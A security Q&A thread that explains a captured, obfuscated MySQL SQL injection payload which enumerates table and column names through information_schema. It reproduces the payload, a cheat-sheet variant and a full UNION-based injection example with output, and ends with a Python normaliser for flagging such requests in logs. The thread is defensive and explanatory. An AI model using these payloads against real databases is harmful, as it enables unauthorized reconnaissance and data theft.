Understanding the SQL injection payload

24

My server was hit by the following SQL injection payload:

((/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a))

What do (@) and (@:=0x00) mean in this payload?

For standalone execution, the payload above has to be run as:

select ((/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a));

The payload had a syntax error.

    
posted by Aayush 24.07.2017 - 08:58

1 answer

28

What does (@) and (@:=0x00) stand for in this payload?

  • @ - is the variable name
  • @:=0x00 - assigns zero to this variable.

Note: := is the assignment operator

Thanks to @Frank Cedeno and @strnk for their Q&A in the comments.

@Frank Cedeno - How /!12345sELecT/ becomes select?

@strnk - This is a MySQL-specific extension to SQL comments, the sELecT is only included in the query if the server version is greater or equal to 12345 (1.23.45), so it filters out non-MySQL servers

More information:

From websec sql_injection:

Retrieving multiple tables / columns at once

SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x

Example:

SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x), 4--+';

Output:

[ information_schema ] >CHARACTER_SETS > CHARACTER_SET_NAME
[ information_schema ] >CHARACTER_SETS > DEFAULT_COLLATE_NAME
[ information_schema ] >CHARACTER_SETS > DESCRIPTION
[ information_schema ] >CHARACTER_SETS > MAXLEN
[ information_schema ] >COLLATIONS > COLLATION_NAME
[ information_schema ] >COLLATIONS > CHARACTER_SET_NAME
[ information_schema ] >COLLATIONS > ID
[ information_schema ] >COLLATIONS > IS_DEFAULT
[ information_schema ] >COLLATIONS > IS_COMPILED

This StackOverflow answer explains the SQL code:

First of all I would make the query a little bit more readable by reformatting it:

1) SELECT (SELECT (@)
2)         FROM (SELECT (@:=0x00),
3)                      (SELECT (@)
4)                       FROM (information_schema.columns)
5)                       WHERE (table_schema >= @)
6)                       AND   (@) IN (@:=CONCAT(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))
7)                       )
8)               )
9)        a);

The assignment of @ is as follows:

  1. In Line 3 it gets the value 0x00 (Decimal: 0)
  2. In line 5 this value is used for the greater than (table_schema >= 0)
  3. Line 6 is a way to concat each schema, table and column name into @
  4. @ is returned in line 1 and contains a concatenated list of your structures

In line 6 an additional <br> (0x3C,0x62,0x72,0x3E) is added to the variable to make the output more readable

    
answered 24.07.2017 - 09:28
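As an added example (editor's code, not part of the question or the answer above), the following Python script does what a log reviewer or WAF rule author has to do with a request like the one quoted: expand the `/*!12345 ... */` version comments the way a MySQL server would, strip the inline comment splitting `DatAbAsE/*data*/()`, decode the `0x...` literals, and report why the query deserves a flag. The function names, the `server_version` placeholder `50700` and the indicator list are my own assumptions; the sample input is the payload from the question, embedded as a constant.

```python
import binascii
import re

# Constructed sample: the obfuscated payload quoted in the question above,
# as a web server or WAF log would record it (backticks are identifier quotes).
CAPTURED_PAYLOAD = (
    "((/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from"
    "(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in"
    "(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a))"
)

# /*!NNNNN body*/ : MySQL version-conditional comment, NNNNN is a 5-digit version.
VERSION_COMMENT = re.compile(r"/\*!(\d{5})(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def unwrap_version_comments(sql, server_version):
    """Expand /*!NNNNN body*/ the way a MySQL server of `server_version` would:
    keep the body if NNNNN <= server_version, otherwise drop the whole comment.
    Any other SQL dialect sees only a comment, so the keyword disappears."""
    def repl(m):
        return m.group(2) if int(m.group(1)) <= server_version else ""
    return VERSION_COMMENT.sub(repl, sql)


def decode_hex_literals(sql):
    """Map every even-length 0x... literal to its text, escaping non-printables.
    MySQL reads such literals as byte strings, which is how '<br>' and '::'
    are kept out of the visible query text."""
    decoded = {}
    for m in HEX_LITERAL.finditer(sql):
        digits = m.group(1)
        if len(digits) % 2:          # odd length: a number, not a byte string
            continue
        text = binascii.unhexlify(digits).decode("latin-1")
        decoded["0x" + digits] = "".join(
            ch if 32 <= ord(ch) < 127 else "\\x%02x" % ord(ch) for ch in text
        )
    return decoded


def normalize(sql, server_version=50700):
    """Rewrite the payload as the engine would actually parse it.
    server_version=50700 is an assumed placeholder for a 5.7.x server.
    Version comments must be expanded BEFORE plain comments are removed,
    otherwise PLAIN_COMMENT would swallow them, keyword included."""
    s = unwrap_version_comments(sql, server_version)
    s = PLAIN_COMMENT.sub("", s)         # DatAbAsE/*data*/() -> DatAbAsE()
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def find_indicators(raw, normalized):
    """Human-readable reasons a reviewer should flag this query."""
    found = []
    if VERSION_COMMENT.search(raw):
        found.append("version-conditional comment /*!NNNNN ... */ hides a keyword")
    if "@:=" in normalized:
        found.append("user variable assigned with := inside a SELECT (row accumulator)")
    if "information_schema" in normalized:
        found.append("reads information_schema (schema enumeration)")
    if "concat(" in normalized:
        found.append("CONCAT() folds every matching row into the variable")
    return found


def analyze(raw, server_version=50700):
    normalized = normalize(raw, server_version)
    return {
        "normalized": normalized,
        "hex_literals": decode_hex_literals(raw),
        "indicators": find_indicators(raw, normalized),
    }


if __name__ == "__main__":
    report = analyze(CAPTURED_PAYLOAD)
    print(report["normalized"])
    for literal, text in report["hex_literals"].items():
        print(f"{literal} -> {text!r}")
    for reason in report["indicators"]:
        print("flag:", reason)
```

Running it shows why a case-sensitive or comment-unaware filter misses this request: the raw text contains no bare `select`, the function name is split by `/*data*/`, and the long hex literal turns out to be the separator `<br>Table Found : ` that the accumulator prepends to each `table::column` pair. With `server_version` below 12345 the same normaliser drops every `sELecT`, which is the version gate the answer describes.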
